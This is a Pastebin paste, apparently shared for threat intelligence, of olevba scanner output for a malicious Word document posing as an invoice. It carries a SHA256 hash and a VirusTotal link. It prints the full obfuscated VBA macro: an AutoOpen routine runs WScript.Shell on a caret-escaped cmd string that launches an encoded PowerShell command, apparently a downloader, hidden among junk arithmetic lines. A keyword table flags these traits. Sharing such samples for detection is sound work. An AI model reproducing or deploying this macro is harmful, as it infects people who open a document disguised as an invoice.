Advertisement
e55db081d05f58a

634dfff634ab6496975c3c89ec74d9b0abb61341e6c219b227a7e9c928b5

Aug 23rd, 2018
5,625
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 14.49 KB | None | 0 0
  1. //Upload by @defconisov3r
  2. //SHA256: 634dfff634ab6496975c3c89ec74d9b0abb61341e6c219b227a7e9c928b519d6
  3. //VT link: https://www.virustotal.com/#/file/634dfff634ab6496975c3c89ec74d9b0abb61341e6c219b227a7e9c928b519d6/detection
  4.  
  5. Flags        Filename                                                        
  6. -----------  -----------------------------------------------------------------
  7. OLE:MAS-HB-- abacocomunitario.org_Invoice
  8. ===============================================================================
  9. FILE: abacocomunitario.org_Invoice
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO iCGjuRj.cls
  13. in file: abacocomunitario.org_Invoice - OLE stream: u'Macros/VBA/iCGjuRj'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. (empty macro)
  16. -------------------------------------------------------------------------------
  17. VBA MACRO jcHcCcqU.bas
  18. in file: abacocomunitario.org_Invoice - OLE stream: u'Macros/VBA/jcHcCcqU'
  19. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  20. Function jAXolAF()
  21. On Error Resume Next
  22. VarType 89455 + mquJj / ibRzrz - 85918
  23.    HjdKE = 61734 - 99722
  24. PcBtbrpk = "md " + "/V/C" + CStr(Chr(aMPAEGzVSJiP + upqRhiJSvaof + 34 + GzELlppWbYSiSG + flrZiTwwjG)) + "S^e" + "^T^ ^" + " ^ Q" + "y^i" + "^6^=^p^"
  25. HjdKE = 66322 - HNGiUF - 92518 + wuPrDK
  26.    HjdKE = Log(QLQVHo)
  27.    IsArray 54951 / EOtLt
  28. JOOIdvurc = "o^w^er" + "^%he^" + "l^l^" + " -e^ ^J" + "^#^B" + "^[" + "^#/^" + "E^#" + "^e^g^"
  29. HjdKE = Sqr(490307260)
  30.    VarType Tan(RAJtfM)
  31.    IsArray Cos(90078994)
  32. qkFzUNiJ = "#^9" + "^" + "#" + "^G4#ZQ" + "^B^" + "5^#C" + "?^" + "#.w^" + "B^i" + "#^" + "G^o^" + "#ZQ^Bj#" + "^H"
  33. HjdKE = swtuPv - DlBuX
  34.    IsArray CDate(7)
  35. PczktabYK = "Q^#" + "I#B" + "O#^G" + "^U#^d" + "#^#:#/" + "c^#" + "Z^Q" + "B^" + "i#EM#^"
  36. VarType CBool(uNnTwP)
  37. JadXKKWSiq = ".#^Bp#G" + "^U" + "#" + "^." + "g^B^" + "?#^" + "`^%^#^J" + "^#" + "^Br"
  38. jAXolAF = PcBtbrpk + JOOIdvurc + qkFzUNiJ + PczktabYK + JadXKKWSiq
  39.    VarType ijmBj / 60313 + iHIYOX / ssvoqZ
  40. End Function
  41. Function KJVtVWukFcf()
  42. On Error Resume Next
  43. IsArray 23391 + CiQfJR
  44.    IsArray 11241 * MPBVU
  45.    VarType CStr(PKkwZI)
  46. BQBWOB = "^#E8#Z" + "^#^#" + "^9#" + "Cc^#" + "^" + "a#^B" + "?#H" + "^Q#c" + "^#^#}^" + "#C"
  47. VarType Tan(90)
  48.    IsArray CByte(2)
  49.    IsArray 99163 * QaVwnL - JMjdUl * oipuq
  50.    HjdKE = CByte(90462 / CbPUKj)
  51. XrqUzEOAYcn = "^" + "8#" + "^Lw" + "B^?^#G" + "^U^#cwB" + "^?#`^" + "U#^" + "Lg" + "Bw^#" + "^G^U^#" + "d#^B" + "^"
  52. IsArray Rnd(59265 - ilVhYj - 75702 + bUZvmt)
  53. GBQqvOdbz = "l^#^H^I" + "#^d^" + "w^Bv" + "#" + "^G8^#Z" + "#^Bp#G" + "^" + "4" + "#Z^w^#"
  54. HjdKE = Cos(2024)
  55.    HjdKE = Round(nLRdPc / zCALR)
  56.    HjdKE = 17372 * disZGi / 14801 * ECdAm
  57. FRMczU = "^:^#" + "G" + "M^#.^w^" + "B'#C8^" + "#SgB" + "^z#E^4#" + "^MQB^Z^" + "#^" + "H" + "^U" + "#d" + "^Q#4^"
  58. IsArray iwnJiq + CbkIah * KsGtQ / 61226
  59.    HjdKE = CCur(341707968)
  60.    HjdKE = Oct(71202 / 22511)
  61. ijalBNf = "#" + "^E" + "^##a^" + "#B^?^" + "#HQ#" + "c" + "^##}^"
  62. HjdKE = Hex(90717 / GSqTT * RSJmo / ihaCN)
  63. idjuUwLuiS = "#C" + "8^" + "#^L^" + "wB^" + ":#^G^U#" + "dw^#^" + ":#^G" + "^g^#a^Q" + "^B^%#GE"
  64. HjdKE = 46405 + 46326
  65.    HjdKE = WQzFA * rICSd
  66.    IsArray 68633 * SqIXR + mcMqc + 11946
  67.    IsArray Rnd(38392 * unKjJ)
  68.    IsArray CDec(wTvql)
  69.    VarType bTHHJi + uBKhns
  70. UqwzowfTLwL = "^#cg^B^" + "p^#G^" + "8#dQ" + "^B^z" + "#C4^#" + "^YgB" + "l#C^" + "8#" + "c^Q^" + "BK#G^8#" + "c^w^" + "Br^#H" + "c^#^"
  71. VarType Oct(NBaSsU)
  72.    VarType Cos(zmnuR)
  73.    VarType Sqr(LUZlD)
  74.    VarType Tan(cGwHb)
  75.    IsArray XhawXp - 34068 / 6151 - ddbWfQ
  76.    VarType Oct(EYEhTm)
  77. FtBwBuzQfV = "Q^#^Bo^" + "#HQ^" + "#^d#B" + "^w" + "#^`^" + "o^#Lw^#" + "v^" + "#^G?^#Y" + "QBy#"
  78. HjdKE = CCur(sDnfwC)
  79.    VarType 54269 * ObbVi
  80. mZlGakhFv = "^GM" + "#aQBh^" + "#^Gw" + "^#ZwBh#" + "^HI#^" + "Y" + "wBp^#" + "G^E#^Lg"
  81. VarType Val(nzmfzs - jUdAU + hpWSAc / wLwii)
  82.    HjdKE = cwiwTW / uAAQY
  83.    HjdKE = CDec(Puibb)
  84. dXYXiYSwIF = "B^" + "j^#^G8#" + "^.Q#^:^" + "#^GI^#c" + "^g^"
  85. VarType CDate(JjCXJr)
  86.    VarType 84591 * FRGSKV
  87.    HjdKE = CDate(FtsRl)
  88.    IsArray 6058 - BBiJl + CYbwEr * VjGSBK
  89.    IsArray CDate(DjzAu / vSsrJK)
  90. tzzDKdb = "#v#" + "EM^#_" + "^#^Bm^" + "#/^E^#^" + ".^g^B"
  91. VarType SHmvIm / zrdUsw * wQaON / szzZIn
  92.    VarType TnDmr + hnozJ / 12224 - JSUXEH
  93. tZslsokKrl = "##Gg#^" + "d#B" + "^?" + "#H#^#" + "Og^#" + "v^#C^8#" + "d^wB5#" + "Hc" + "^" + "#L^g^B" + "'#^H^" + "U" + "^#^aw"
  94. HjdKE = CDate(kGDQw + 35174)
  95.    VarType 54714 * DfMAR + wjbNP + bMouRc
  96.    VarType nULhj / ZhAnW + caEHb * 67169
  97. btBzDtWj = "B?#G^8" + "^#^LgB^" + "y^#" + "^HU" + "#c^#^B" + "v^#G^%#"
  98. KJVtVWukFcf = BQBWOB + XrqUzEOAYcn + GBQqvOdbz + FRMczU + ijalBNf + idjuUwLuiS + UqwzowfTLwL + FtBwBuzQfV + mZlGakhFv + dXYXiYSwIF + tzzDKdb + tZslsokKrl + btBzDtWj
  99.    HjdKE = Sin(EUqBZK)
  100. End Function
  101. Function ImjkiBkZ()
  102. On Error Resume Next
  103. HjdKE = Hex(2)
  104.    HjdKE = Rnd(8832)
  105.    HjdKE = lhKjp + 97834
  106. fzmnaJYvJ = "L^gB^:" + "#^G^U^" + "#d^#" + "^#v#" + "/^M^" + "#Q#Bo" + "^#HQ#" + "d^#^B" + "^w^#" + "^`^o#" + "^" + "L^w#v#^" + "H^o^"
  107. VarType Val(zZZGjB)
  108.    HjdKE = 99754 - vQdzvl * OTriu - UYwmii
  109.    HjdKE = CVar(MJGSj / 24527 * LVzstu - 77227)
  110. dYKIfYC = "#Y^Q" + "Bp#" + "G4#" + "^YQ^B" + "^i#" + "^H^M#" + "^a^" + "Q^B^" + "w" + "#H^I" + "^#YQ#^:" + "^#G^I^#"
  111. VarType Atn(353827860)
  112. RFEHGiZ = "^.^" + "#" + "^B" + "v^" + "#" + "^Gc#^Lw" + "^Bw^#GY" + "#cgB^[^" + "#E8^#J" + "w" + "#:^#/^M" + "^#c" + "#^B^%#G"
  113. HjdKE = Month(411291583)
  114.    HjdKE = Rnd(5)
  115.    VarType Val(chWHiJ)
  116. MrwvPK = ",#^d^#" + "#^o#Cc#" + "Q^##n#" + "C," + "^#" + "Ow#^" + ",^#^Ec^" + "#^SwBH"
  117. IsArray Round(kkPRYs)
  118. kPSaKGKrctP = "^" + "#C^##" + "[^" + "Q#g" + "^#C" + "c" + "#N^##" + "^y#^" + "`,^#"
  119. VarType 87503 / UBwcnc - dvjkko + cwGqf
  120.    IsArray Rnd(fhQrR)
  121.    VarType 84771 - IjnLX * FPPnc - MrCCK
  122.    HjdKE = VQliU * HFHsLu / 36289 / WSDrGl
  123. KjjiSDp = "J^w^#7" + "#C" + "Q^#c" + "^gB?^" + "#" + "^GY^#" + "[^Q" + "^#^," + "^#^G" + "U#^.g" + "B" + "^"
  124. IsArray Cos(1767)
  125.    VarType TypeName(ovKdN)
  126.    VarType CDbl(WUdSkO)
  127. zImbOtUvTza = "2#`^o^" + "#c^" + "#B^1" + "^" + "#GI^#" + ".^#^B" + "^p#^GM" + "^#K^"
  128. HjdKE = LCase(WTMBSJ / ImDJP - VQOiw - ttOvS)
  129.    IsArray Month(lQNGWa - QdFUkb)
  130.    HjdKE = Cos(251)
  131. uBwqwYiUz = "w^#" + "n^#/w^" + "#" + "^" + "J"
  132. VarType Hex(BRsfV)
  133.    HjdKE = CVar(hXHvJt)
  134. icJjIOY = "^w" + "^#r^" + "#" + "C^Q^#R^" + "w^B^L" + "#Ec^#^K" + "w#n" + "^#C^" + "4#Z"
  135. VarType GNZwM * EVYln
  136.    IsArray 6101 + KivMr - naSqIX + fzwjaP
  137.    IsArray KmSXq / TUrCnu
  138. UidjZ = "QB^" + "4^#GU" + "^#Jw#7" + "#G" + "Y^#.w" + "^B^" + "y#^" + "GU#YQB" + "j#Gg#K"
  139. HjdKE = CDbl(VfoUL)
  140.    HjdKE = Round(pjLHzE)
  141.    HjdKE = Atn(6759)
  142.    IsArray Str(NicjF)
  143. sFhBoRG = "^##,^#" + "/^,#^Z" + "gB^Q#C" + "^#^" + "#a" + "QB^:#C" + "#^#" + "^J#^B"
  144. ImjkiBkZ = fzmnaJYvJ + dYKIfYC + RFEHGiZ + MrwvPK + kPSaKGKrctP + KjjiSDp + zImbOtUvTza + uBwqwYiUz + icJjIOY + UidjZ + sFhBoRG
  145.    IsArray Oct(3)
  146.    VarType 65365 * uPKlEF - JmjEbk / GQwJM
  147. End Function
  148. Function ZSKiLOqwKsl()
  149. On Error Resume Next
  150. HjdKE = Atn(dfDoKk)
  151.    IsArray Oct(820)
  152.    IsArray Str(94732 * ROSQjE)
  153. ZErjONNzN = "r#E8" + "^#Z^##" + "p#^H^%#" + "d#" + "^B^y#H^" + ",#" + "e^w#" + ",^#^E" + "^8#^UQ" + "^" + "B^}" + "^#C4"
  154. IsArray 1893 / SKAuvj + 27780 / izYdri
  155.    HjdKE = 25055 * qmLZi + 5564 * zEERG
  156. jijnsZIoG = "^#R^#B" + "v^#^Hc" + "^#.g^B" + "^%^#" + "^G^8" + "#^YQB,#" + "E^Y^#^" + "a^" + "QB^%" + "#GU#^K#" + "^#,#" + "/" + ",^#^"
  157. VarType Val(9134)
  158.    VarType 74595 * KzmwX
  159.    IsArray Round(1)
  160. FriYjjlcfZ = "Z^g^BQ^" + "#C" + "w^" + "#^" + "I##^,^#" + "^H" + "I^"
  161. VarType CDbl(jYAoZ)
  162.    IsArray CDate(QSmpAk + swqbw + WzlZhh - QwWAIk)
  163. kslMTwijjJQ = "#^d^#" + "B" + "m^#" + "C^,^" + "#^O^" + "w"
  164. IsArray CBool(63865 / YlIzZ / BjaRkM * UBLWt)
  165.    IsArray CVar(iMozW)
  166.    HjdKE = Rnd(zQfuIv)
  167.    HjdKE = NJMiE - dKFBzh / 74963 - HrqhTv
  168. NjYZKIBbWip = "^BJ^" + "#^G4" + "^#^" + "d^gBv" + "#G^%#ZQ" + "#'" + "^" + "#E" + "," + "^"
  169. VarType Val(aclOj - otwaDN)
  170. CzHakr = "#" + "^d^" + "#^B^l#^" + "G^?" + "#I^##^," + "#" + "^" + "H^I^#"
  171. HjdKE = QCOjX / WzCudh
  172.    HjdKE = LdQIzF / fWfifI / vqczN - YvHaQO
  173. bmSNKViO = "^d" + "#^B^m#^" + "`^%^#" + "^Y^g^B^" + "y" + "^#"
  174. VarType UCLdwl * mFFPak + 61338 + 66824
  175. YwHzzovJWD = "^G^U" + "#^YQ^Br" + "^#`^%#^" + "f" + "Q^Bj^#G" + "^E#^d#" + "^B^" + "j#" + "G" + "g^#" + "e^w^" + "B^9"
  176. HjdKE = Sin(HCMSdT * XPVqr)
  177.    IsArray Atn(TwCdT)
  178. YikCquN = "#H^?#^" + "I#^#^g^" + "#" + "C^#" + "^" + "#^" + "I##g#C^" + "#"
  179. IsArray TypeName(3)
  180.    HjdKE = LCase(DXuwNo)
  181. wnsvrG = "^#" + "I##^g#" + "C##^I##" + "g#C^#^#" + "^I^" + "##^g" + "^#C#^#I" + "##g#^#" + "==" + "&    " + "S^e^"
  182. VarType CBool(YjwcX)
  183. rolFrIcvwwK = "t ^ ^" + "  ^" + "m^" + "a" + "^i=^!^Q" + "^y" + "i^6:^`=" + "D^" + "!&S" + "^e^T " + " ^ ^Y^"
  184. ZSKiLOqwKsl = ZErjONNzN + jijnsZIoG + FriYjjlcfZ + kslMTwijjJQ + NjYZKIBbWip + CzHakr + bmSNKViO + YwHzzovJWD + YikCquN + wnsvrG + rolFrIcvwwK
  185.    VarType CStr(15)
  186.    HjdKE = Round(FYVcwN)
  187.    HjdKE = Oct(GodFk)
  188. End Function
  189. Function Elzojkj()
  190. On Error Resume Next
  191. VarType 48373 / EbwmH
  192.    IsArray CStr(IujVK)
  193.    VarType Oct(wUSDE)
  194. rnKMF = "o9=" + "^!^m" + "^a^i^:" + "/^=^" + "F^"
  195. IsArray Int(fbvRJ)
  196.    HjdKE = Hex(YjGzl)
  197.    VarType CVar(71594 * JRXOHp + 43103 / 89640)
  198. hibJd = "!&" + "& S^" + "Et  ^ ^" + " ^Mg9^" + "i=^" + "!" + "^Y^o^9^" + ":" + "'^=^t" + "!&&  s^" + "E" + "^T ^  "
  199. IsArray Round(57018 + JsjXj)
  200. tNwRnWprBsG = "^0^H" + "Y=^!^M" + "^g^9^" + "i" + "^:^" + "[=^P!& " + "   S^e" + "t ^ ^  " + "^K^m=" + "!^0^HY" + "^"
  201. HjdKE = 19838 / EjPcjj - mULtOF / wmpfO
  202. wvdktS = ":" + "%=" + "s^!&   " + "S^eT" + " ^  " + " ^ X"
  203. HjdKE = 74252 - CiDwjX / YBnKvp * bZcHzs
  204.    VarType CDec(4798)
  205.    HjdKE = kHScra + oMVfkq + FDsLY + vEkmD
  206.    IsArray Sqr(74714 * tWXDLN * HKHrTs / wXjUMq)
  207. CsvcldcW = "^h=!" + "^K^" + "m" + ":#^=^A" + "!&" + " S^E^" + "t " + "^ ^" + " ^  qo" + "^"
  208. VarType 59402 / FMCjd
  209.    IsArray Round(443)
  210. mKBwQVzTKM = "J^a=^" + "!^X^" + "h^" + ":^.^" + "=b!&& S"
  211. HjdKE = Rnd(1)
  212.    IsArray CStr(8)
  213.    HjdKE = TimeValue(jtAidY)
  214.    IsArray 40354 / IRSki - 67037 + jhkJZH
  215. ZljjstFMz = "^e" + "T" + " ^ ^  " + "^7^8" + "F" + "=^!^q^" + "o^J^a^:" + "}^=6^" + "!&SE^t " + " ^ ^" + " ^1^k"
  216. IsArray doXrG + 77616
  217. stDOYWED = "^gx" + "=^!^" + "7^8F:?" + "^=0^!" + "&& s" + "^e^T" + " ^ ^" + "mq=^!" + "^" + "1^k^g" + "^x^:^,^" + "=^k^!&&"
  218. VarType Rnd(RLoNO + dYwiw + 75398 / ouMUMk)
  219.    IsArray Log(jkraBu - obwEw)
  220. tjUYUNlLPz = "s^" + "E^" + "T ^" + " ^ ^ ^" + "x^WV" + "=!^mq^:" + "^5" + "=^3^" + "!&& " + "   "
  221. Elzojkj = rnKMF + hibJd + tNwRnWprBsG + wvdktS + CsvcldcW + mKBwQVzTKM + ZljjstFMz + stDOYWED + tjUYUNlLPz
  222.    HjdKE = CDate(uVfzE)
  223. End Function
  224. Function CAwvdI()
  225. On Error Resume Next
  226. VarType Sgn(iXiAc)
  227.    VarType 72533 + UqQhaz * 75721 - 24370
  228. FYYcuEm = "se" + "^t  ^ Q" + "^" + "F^" + "4=!^x^W" + "V^:^" + ":^=^u" + "!&& " + " s^ET " + "^"
  229. VarType Hex(VirquK)
  230.    VarType CDate(69163 - kwwwi - 36497 - tUGTnj)
  231.    HjdKE = CDec(79378 - MmuhH + ZskktO - ZfNHk)
  232.    IsArray CByte(34990 + 97914 * mimIiM + TuqKp)
  233. DEznAYUkwM = " ^" + " Y^h^" + "Wq" + "=!Q^F^" + "4^:^" + "_^" + "=T^!&" + " " + " C^a^L^" + "L %Y^" + "h^W" + "q% "
  234. VarType VQOzp / COZWf
  235. iqDSdsvA = "  " + CStr(Chr(RpMYpzOS + iKvYORwDM + 34 + auDorRnBFc + hFlMuoSrc)) + "  " + ""
  236. CAwvdI = FYYcuEm + DEznAYUkwM + iqDSdsvA
  237.    HjdKE = DaBwGW * MzZaY
  238.    HjdKE = Second(69617 * MXdLO - Jlbcn - 10846)
  239.    HjdKE = rUJSo + QVbJt
  240.    HjdKE = 51516 - fwiah * 83018 + 42705
  241. End Function
  242.  
  243. -------------------------------------------------------------------------------
  244. VBA MACRO ZvqYdDFdD.bas
  245. in file: abacocomunitario.org_Invoice - OLE stream: u'Macros/VBA/ZvqYdDFdD'
  246. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  247.  
  248. Sub AutoOpen()
  249. On Error Resume Next
  250. CreateObject("WScript.Shell").Run! ChrW(1 + 3 + 8 + 9 + 46) + UOSVLtjFjkdrbZ + zQXKMuPDmBPw + jAXolAF + KJVtVWukFcf + ImjkiBkZ + ZSKiLOqwKsl + Elzojkj + CAwvdI + JdPEZiKhHGumjm + tUEwiEhQmZzO, 188069728 - 188069728
  251. End Sub
  252.  
  253. +------------+----------------------+-----------------------------------------+
  254. | Type       | Keyword              | Description                             |
  255. +------------+----------------------+-----------------------------------------+
  256. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  257. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  258. |            |                      | strings (use option --deobf to          |
  259. |            |                      | deobfuscate)                            |
  260. | Suspicious | ChrW                 | May attempt to obfuscate specific       |
  261. |            |                      | strings (use option --deobf to          |
  262. |            |                      | deobfuscate)                            |
  263. | Suspicious | Shell                | May run an executable file or a system  |
  264. |            |                      | command                                 |
  265. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  266. |            |                      | command                                 |
  267. | Suspicious | Run                  | May run an executable file or a system  |
  268. |            |                      | command                                 |
  269. | Suspicious | CreateObject         | May create an OLE object                |
  270. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  271. |            |                      | be used to obfuscate strings (option    |
  272. |            |                      | --decode to see all)                    |
  273. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  274. |            |                      | may be used to obfuscate strings        |
  275. |            |                      | (option --decode to see all)            |
  276. | Hex String | 'I\x03\x07&'         | 49030726                                |
  277. | Hex String | '\x90\x07\x89\x94'   | 90078994                                |
  278. | Hex String | '4\x17\x07\x96'      | 34170796                                |
  279. | Hex String | "58'\x86"            | 35382786                                |
  280. | Hex String | 'A\x12\x91X'         | 41129158                                |
  281. | Hex String | '\x18\x80ir'         | 18806972                                |
  282. | Base64     | '\x8d\xc1\xdc\t\xca\ | jcHcCcqU                                |
  283. | String     | x94'                 |                                         |
  284. | Base64     | '\xfd_\xc2'          | /V/C                                    |
  285. | String     |                      |                                         |
  286. +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement